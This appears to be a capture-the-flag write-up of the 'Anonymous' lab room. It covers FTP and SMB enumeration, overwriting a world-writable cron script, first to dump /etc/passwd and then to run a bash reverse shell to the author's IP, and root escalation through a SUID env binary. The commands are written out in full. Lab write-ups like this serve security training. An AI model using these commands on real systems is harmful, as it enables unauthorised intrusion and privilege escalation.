Anonymous is a medium rated room which has a anonymous login enabled in ftp which has a folder called scripts in which anyone can write a file. It also has a script which is continuously being executed probably as a cron job. So we overwrite this script to get a reverse shell. Inside the box, we exploited the binary env which had SUID bit enabled to get a root shell.

ENUMERATION

Open ports are 21 FTP, 22 SSH, 139 and 445 Samba.

  • 4

2. What service is running on port 21?

I got the answer from my nmap scan result above.

  • FTP

3. What service is running on ports 139 and 445?

Here I just read the answer from my scan result as well.

  • SMB

4. There’s a share on the user’s computer. What’s it called?

To enumerate the available share I used smbclient with following command:

smbclient -L //'machine-ip' -N

  • pics

To list all files in this share I used the smbclient with the share I want to inspect:

smbclient //'machine-ip'/pics

To download the files I used

mget *

and confirmed the download of both files with “y”. Now I have two pictures of cute dogs on my desktop. Couldn’t find anything with my usual steganography tools.

At this point I logged in anonymously to FTP and downloaded the files in the “/scripts” directory:

There is a log file and a to_do file but the most interesting one is the “clean.sh” script:

This spwan a shell at the beginning and deletes the content of the “/tmp” directory. In addition this script is world write- and executable. I wanted to try something and changed the content of the downloaded script file to:

#!/bin/bash

cat /etc/passwd > /var/ftp/scripts/home.txt

and uploaded it again with

put clean.sh

to overwrite the existing script with my own. After a while my new file “home.txt” appears with the content I requested:

We now have the usernames “root” and “namelessone” and the script works as well! So what stops us from uploading a reverse shell? Changing the content of the “clean.sh” file again with following content:

#!/bin/bash

bash -i >& /dev/tcp/'my-own-ip'/4444 0>&1

Then I started a netcat listener with

nc -lnvp 4444

and uploaded the new script file again with the put command. After waiting for a bit I got my reverse shell!

Here I was able to read the “user.txt” file for the flag.

PRIVILEGE ESCALATION

First things first sudo -l but I wasn’t allowed to execute anything. Then I started the search command for SUID files:

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

The “/usr/bin/env” file looks a bit odd and I found an entry on GTFOBins right here. The SUID binary is already set up and I just had to run:

/usr/bin/env /bin/sh -p

The flag was located at the “/root” directory.

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube